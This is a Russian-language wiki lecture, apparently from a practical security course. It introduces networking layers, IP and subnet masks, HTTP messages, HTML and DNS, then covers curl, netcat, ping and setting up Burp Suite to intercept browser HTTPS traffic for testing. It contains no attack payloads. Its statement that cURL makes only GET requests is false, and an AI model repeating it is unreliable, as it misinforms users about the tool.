Транспортный уровень модели предназначен для обеспечения надёжной передачи данных от отправителя к получателю. Примеры протоколов, работающего на этом уровне - TCP (Transmission Control Protocol), UDP (User Datagram Protocol).
====Сеансовый уровень====
Сеансовый уровень модели обеспечивает поддержание сеанса связи, позволяя приложениям взаимодействовать между собой длительное время. Примеры протоколов, работающего на этом уровне - PPTP (Point-to-Point Tunneling Protocol), RPC (Remote Procedure Call Protocol).
====Уровень представления====
Уровень представления обеспечивает преобразование протоколов и кодирование/декодирование данных. Важный протокол данного уровня - SSL и TLS, которые обеспечивают шифрование в протоколе HTTPS (о нём ниже).
====Прикладной уровень====
Прикладной уровень — верхний уровень модели, обеспечивающий взаимодействие пользовательских приложений с сетью:
* позволяет приложениям использовать сетевые службы:
** удалённый доступ к файлам и базам данных,
** пересылка электронной почты;
* отвечает за передачу служебной информации;
* предоставляет приложениям информацию об ошибках;
* формирует запросы к уровню представления.
Важные протоколы данного уровня - HTTP и HTTPS. О них подробно мы поговорим ниже.

===Сетевая модель TCP/IP===
[[Файл:OSI and TCPIP.png|1024px]]
Кроме модели OSI используется так же модель TCP/IP.

TCP/IP — сетевая модель передачи данных, представленных в цифровом виде. Модель TCP/IP и модель OSI являются концептуальными моделями, используемыми для описания всех сетевых коммуникаций, в то время как TCP/IP сама по себе также является важным протоколом, используемым во всех операциях Интернета. Модель TCP/IP широко используется в описании сети и старше модели OSI, у них обоих много слоев.

Стек протоколов TCP/IP делится на 4 уровня:
# Уровень сетевого доступа
# Сетевой
# Транспортный
# Прикладной
Прикладной уровень соответствует сеансовый уровень , уровень представления и прикладной уровень, а уровню сетевого доступа - физический и канальный уровни.
===Ethernet===
Пример протокола уровня сетевого доступа - Ethernet. Это семейство технологий пакетной передачи данных между устройствами. Описывается семейством стандартов 802.3. Каждому устройству присваивается уникальный идентификатор - MAC-адрес.
[[Файл:Ethernet_Type_II_Frame_format.svg.png|1024px]]
===Ip===
На сетевом уровне чаще всего используется протокол IP.
IP-адрес — уникальный сетевой адрес узла в компьютерной сети, построенной на основе стека протоколов TCP/IP. Используется IPv4 (32 бита ) и IPv6 (128 бит).

Маска подсети — битовая маска для определения по IP-адресу адреса подсети и адреса узла (хоста, компьютера, устройства) этой подсети.

IP-адрес: 11000000 10101000 00000001 00000010 (192.168.1.2)

Маска подсети: 11111111 11111111 11111110 00000000 (255.255.254.0)

Адрес сети: 11000000 10101000 00000000 00000000 (192.168.0.0)
===Порт===
Порт — натуральное число, заголовках протоколов транспортного уровня модели OSI. Используется для определения процесса-получателя пакета в пределах одного хоста.
На прикладном уровне чаще всего используется протокол HTTP(S).
===TCP===
Протокол, предназначенный для управления передачей данных. Пакеты в TCP называются сегментами.
===HTTP/HTTPS===
HTTP (англ. HyperText Transfer Protocol — «протокол передачи гипертекста») — протокол прикладного уровня передачи данных.
Так же есть протокол HTTPS (S - Secure) — расширение протокола HTTP для поддержки шифрования в целях повышения безопасности.
Каждое HTTP-сообщение состоит из трёх частей, которые передаются в указанном порядке:
Стартовая строка (англ. Starting line) — определяет тип сообщения;
Заголовки (англ. Headers) — характеризуют тело сообщения, параметры передачи и прочие сведения;
Тело сообщения (англ. Message Body) — непосредственно данные сообщения. Обязательно должно отделяться от заголовков пустой строкой.

В стартовой строке могут быть следующие типы сообщений:

в случае запроса:
* GET - запрашивает представление указанного ресурса.
* HEAD - запрашивает заголовки, идентичные тем, что возвращаются, если указанный ресурс будет запрошен с помощью HTTP-метода GET
* OPTIONS - используется для описания параметров соединения с целевым ресурсом.
* DELETE - удаляет указанный ресурс.
* PUT - создает новый ресурс или заменяет представление целевого ресурса, данными представленными в теле запроса.
* PATCH - применяет частичную модификацию к ресурсу.
* POST - предназначен для отправки данных на сервер. Тип тела запроса указывается в заголовке Content-Type.
* CONNECT - запускает двустороннюю связь с запрошенным ресурсом.
* TRACE - выполняет проверку обратной связи по пути к целевому ресурсу, предоставляя полезный механизм отладки.
в случае ответа:
* 1xx - информирование о процессе передачи.
* 2xx - информирование о случаях успешного принятия и обработки запроса клиента. В зависимости от статуса, сервер может ещё передать заголовки и тело сообщения.
* 3xx - сообщает клиенту, что для успешного выполнения операции необходимо сделать другой запрос.
* 4xx - указание ошибок со стороны клиента.
* 5xx - информирование о случаях неудачного выполнения операции по вине сервера
Заголовки HTTP (англ. HTTP Headers) — это строки в HTTP-сообщении, содержащие разделённую двоеточием пару имя-значение. Заголовки должны отделяться от тела сообщения хотя бы одной пустой строкой.

Один из самых важных заголовков - cookie.

Cookie — небольшой фрагмент данных, отправленный веб-сервером и хранимый на компьютере пользователя. Необходимо для:
аутентификации пользователя;
хранения персональных предпочтений и настроек пользователя;
отслеживания состояния сеанса доступа пользователя;
ведения статистики о пользователях;
Вот выглядит запрос по URL https://ru.wikipedia.org/wiki/%D0%97%D0%B0%D0%B3%D0%BB%D0%B0%D0%B2%D0%BD%D0%B0%D1%8F_%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%B8%D1%86%D0%B0
(Красным цветом выделена стартовая строка, синим - заголовки, фиолетовым - тело запроса)

<span style="color:#B22222">
GET /wiki/%D0%97%D0%B0%D0%B3%D0%BB%D0%B0%D0%B2%D0%BD%D0%B0%D1%8F_%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%B8%D1%86%D0%B0 HTTP/1.1
</span>

<span style="color:#4169E1">
Host: ru.wikipedia.org
</span>

<span style="color:#4169E1">
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
</span>

<span style="color:#4169E1">
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
</span>

<span style="color:#4169E1">
Accept-Language: en-US,en;q=0.5
</span>

<span style="color:#4169E1">
Accept-Encoding: gzip, deflate
</span>

<span style="color:#4169E1">
Connection: close
</span>

<span style="color:#4169E1">
Cookie: WMF-Last-Access=14-Oct-2019; WMF-Last-Access-Global=14-Oct-2019; mwPhp7Seed=f2e; VEE=wikitext; PHP_ENGINE=php7; GeoIP=RU:MOW:Moscow:55.75:37.62:v4
</span>

<span style="color:#4169E1">
Upgrade-Insecure-Requests: 1
</span>

<span style="color:#4169E1">
If-Modified-Since: Mon, 14 Oct 2019 13:19:08 GMT
</span>

и вот как выглядит ответ на него:

<span style="color:#B22222">
HTTP/1.1 200 OK
</span>

<span style="color:#4169E1">
Date: Mon, 14 Oct 2019 14:09:06 GMT
</span>

<span style="color:#4169E1">
Content-Type: text/html; charset=UTF-8
</span>

<span style="color:#4169E1">
Content-Length: 127493
</span>

<span style="color:#4169E1">
...
</span>

<span style="color:#FF00FF">
<!DOCTYPE html>
</span>

<span style="color:#FF00FF">
<html class="client-nojs" lang="ru" dir="ltr">
</span>

<span style="color:#FF00FF">
<head>
</span>

<span style="color:#FF00FF">
<meta charset="UTF-8"/>
</span>

<span style="color:#FF00FF">
<title>Википедия — свободная энциклопедия</title>
</span>

<span style="color:#FF00FF">
...
</span>
===HTML===
HTML - стандартизированный язык разметки документов в интернете. Большинство веб-страниц имеют содержание разметки на языке HTML.
Например, зайдём на сайт http://example.org/
[[Файл:Example org.png|1024px]]
посмотрим её HTML разметку:
[[Файл:Html example org.png|1024px]]
Важное, что сейчас нужно знать про HTML - теги. Вот примеры тега:
<pre>
<strong>Текст между двумя тегами — открывающим и закрывающим.</strong>
<a href="http://www.example.com">Здесь элемент содержит атрибут href, то есть гиперссылку.</a>
</br>
</pre>
Обычно используются парные теги — открывающий, или начальный (<strong>, <a href="http://www.example.com">), и закрывающий, или конечный (</strong>, </a>). Возможно также применение одиночного тега (</br>).
===DNS===
[[Файл:DNS.png|1024px]]
Для получения IP адреса сайта используется DNS.
DNS - компьютерная распределённая система для получения информации о доменах.
Доме́н — узел в дереве имён, вместе со всеми подчинёнными ему узлами (если таковые имеются), то есть именованная ветвь или поддерево в дереве имён. Структура доменного имени отражает порядок следования узлов в иерархии; доменное имя читается слева направо от младших доменов к доменам высшего уровня (в порядке повышения значимости): вверху находится корневой домен (имеющий идентификатор «.»(точка)), ниже идут домены первого уровня (доменные зоны), затем — домены второго уровня, третьего и т. д. (например, для адреса ru.wikipedia.org. домен первого уровня — org, второго — wikipedia, третьего — ru). DNS позволяет не указывать точку корневого домена.
Поддомен — подчинённый домен (например, wikipedia.org — поддомен домена org, а ru.wikipedia.org — домена wikipedia.org). Теоретически такое деление может достигать глубины 127 уровней, а каждая метка может содержать до 63 символов, пока общая длина вместе с точками не достигнет 254 символов. Но на практике регистраторы доменных имён используют более строгие ограничения. Например, если у вас есть домен вида mydomain.ru, вы можете создать для него различные поддомены вида mysite1.mydomain.ru, mysite2.mydomain.ru и т. д.
===Proxy===
Прокси-сервер, иначе - сервер-посредник — промежуточный сервер (комплекс программ) в компьютерных сетях, выполняющий роль посредника между пользователем и целевым сервером (при этом о посредничестве могут как знать, так и не знать обе стороны), позволяющий клиентам как выполнять косвенные запросы (принимая и передавая их через прокси-сервер) к другим сетевым службам, так и получать ответы.
Последнее определение, которое нам понадобится в дальнейшем - proxy-сервер.
Прокси-сервер, иначе - сервер-посредник — промежуточный сервер (комплекс программ) в компьютерных сетях, выполняющий роль посредника между пользователем и целевым сервером (при этом о посредничестве могут как знать, так и не знать обе стороны), позволяющий клиентам как выполнять косвенные запросы (принимая и передавая их через прокси-сервер) к другим сетевым службам, так и получать ответы.
==Инструменты==
В данном курсе нам понадобятся следующие инструменты:
===cURL===
cURL — кроссплатформенная служебная программа командной строки, позволяющая взаимодействовать с множеством различных серверов по множеству различных протоколов с синтаксисом URL.
cURL делает только GET запрос.
пример запроса:
<pre>
curl http://www.google.com/
</pre>
===netcat===
netcat — утилита Unix, позволяющая устанавливать соединения TCP и UDP, принимать оттуда данные и передавать их.
Можно делать как GET, так и POST запросы.
пример запроса:
<pre>
$ nc www.google.com 80
GET / HTTP/1.1
Host: www.google.com
</pre>
===ping===
Утилита для проверки целостности и качества соединений в сетях на основе TCP/IP, а также обиходное наименование самого запроса.
<pre>
home:~$ ping -i 5 -c 3 example.org
</pre>
===traceroute===
Служебная компьютерная программа, предназначенная для определения маршрутов следования данных в сетях TCP/IP.
<pre>
home:~$ traceroute example.org
</pre>
===Host===
Утилита в UNIX-системах, предназначенная для обращения и получения информации DNS-серверов.
<pre>
home:~$ host example.org
</pre>
Burp Suit - Для анализа HTTP-взаимодействия между клиентом и сервером, а также для вмешательства в него удобен Burp Suite. Он может работать как HTTP-proxy, то есть получать от клиента запрос и пересылать его серверу, получать ответ сервера и передавать его клиенту. При этом Burp может показывать запросы и ответы пользователю, задерживать и изменять их. Кроме этого, он может формировать и отправлять новые HTTP-запросы сам ("вручную").
===Burp===
Рекомендуется использовать Burp Suite в связке с браузером Firefox. Для полноценной работы прокси-сервера с браузером нужно настроить следующее:
включить и настроить сам прокси-сервер;
перенаправить весь трафика браузера на прокси-сервер;
добавить корневой сертификат прокси-сервера в список доверенных для возможности перехвата HTTPS-траффика.
Настройка прокси-сервера
В первую очередь нужно запустить Burp Suite, прокликав несколько раз кнопку "Next" и ей подобные. Во вкладке Proxy/Options убедиться в том, что стандартный слушающий порт активен (отметка в столбце Running) или выбрать новый (Add).
[[Файл:Burp guide1.png|1024px]]
Во вкладке Proxy/Intercept убедиться в том, что активный перехват трафика выключен (Intercept is off), в противном случае нажать на кнопку "Intercept is on".
[[Файл:Burp guide2.png|1024px]]
Настройка браузера
Для добавления прокси-сервера в настройках браузера Firefox нужно поискать по ключевому слову "proxy" или "прокси", а затем добавить прокси-сервер http://localhost:8080 (или любой другой свободный порт, его можно настроить в Burp Suite, 8080 - стандартный).
[[Файл:Burp guide3.png|1024px]]
Затем в браузере перейти по ссылке на главную страницу самого прокси-сервера (работает только при перенаправлении трафика через прокси-сервер).
[[Файл:Burp guide4.png|1024px]]
И скачать корневой сертификат неких любителей портвейна (PortSwigger). После этого нужно добавить этот сертификат в браузер (для Firefox: поиск в настройках по "certificate" или "сертификат" и кнопка "Import" в Менеджере сертификатов). А потом убедиться, что PortSwigger CA появился в списке сертификатов.
[[Файл:Burp guide5.png|1024px]]
Иструкция по применению
Теперь все готово для тестирования любого веб-приложения. Для нашего курса нам понадобятся только 2 инструмента из набора Burp Suite:
Proxy;
Repeater.
Вкладка Proxy/Intercept позволяет изменять запросы, отправляемые бразуером "на лету", а затем наблюдать за отображением ответа на модифицированный запрос в браузере. В этой вкладке можно редактировать запросы как тест, а затем пересылать их дальше кнопкой "Forward".
Вкладка Proxy/HTTP history отображает историю всех HTTP(s)-запросов, отправленных браузером, и ответов на них. Для того, чтобы можно было отредактировать и послать на сервер какой-то запрос из истории, нужно кликнуть правой кнопкой мыши на нужный запрос и выбрать пункт "Send to Repeater".
[[Файл:Burp guide6.png|1024px]]
После этого можно перейти во вкладку Repeater, редактировать выбранный запрос как тест и посылать его на сервер кнопкой "Go". В правой половине вкладки будет отображаться ответ от сервера на этот запрос.
[[Файл:Burp guide7.png|1024px]]
==Ссылки==
* [https://drive.google.com/file/d/16MU84BVlB-U9h7mLaE0O0f7n3Ratk1lH/view?usp=sharing Презентация "Введение в веб-технологии"]
* [https://yadi.sk/i/XR_SLTlclESVYA Видео "Введение в веб-технологии"]
* [https://www.google.com/ https://www.google.com/]
* [https://wikipedia.org https://wikipedia.org]
* [https://developer.mozilla.org/ru/docs/Web https://developer.mozilla.org]
* [https://medium.com/@yangmuxizi/tcp-ip-vs-osi-%D0%BA%D0%B0%D0%BA%D0%B8%D0%B5-%D1%80%D0%B0%D0%B7%D0%BB%D0%B8%D1%87%D0%B8%D1%8F-%D1%83-%D1%8D%D1%82%D0%B8%D1%85-%D0%B4%D0%B2%D1%83%D1%85-%D0%BC%D0%BE%D0%B4%D0%B5%D0%BB%D0%B5%D0%B9-7f6e6c7c12ce TCP/IP vs. OSI: Какие Различия у Этих Двух Моделей?]
* [https://course.secsem.ru/wiki/%D0%92%D0%B2%D0%B5%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5_%D0%B2_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D1%83%D1%8E_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D1%8C_(2019)/HTTP,_%D0%B8%D0%BD%D1%81%D1%82%D1%80%D1%83%D0%BC%D0%B5%D0%BD%D1%82%D1%8B_%26_SQL_injection лекция по веб-технологиям]

Файл:Ethernet Type II Frame format.svg.png

2020-09-29T20:39:01Z

Romankholin94:

Файл:Burp guide7.png

2020-09-29T20:31:19Z

Romankholin94: Romankholin94 загрузил новую версию Файл:Burp guide7.png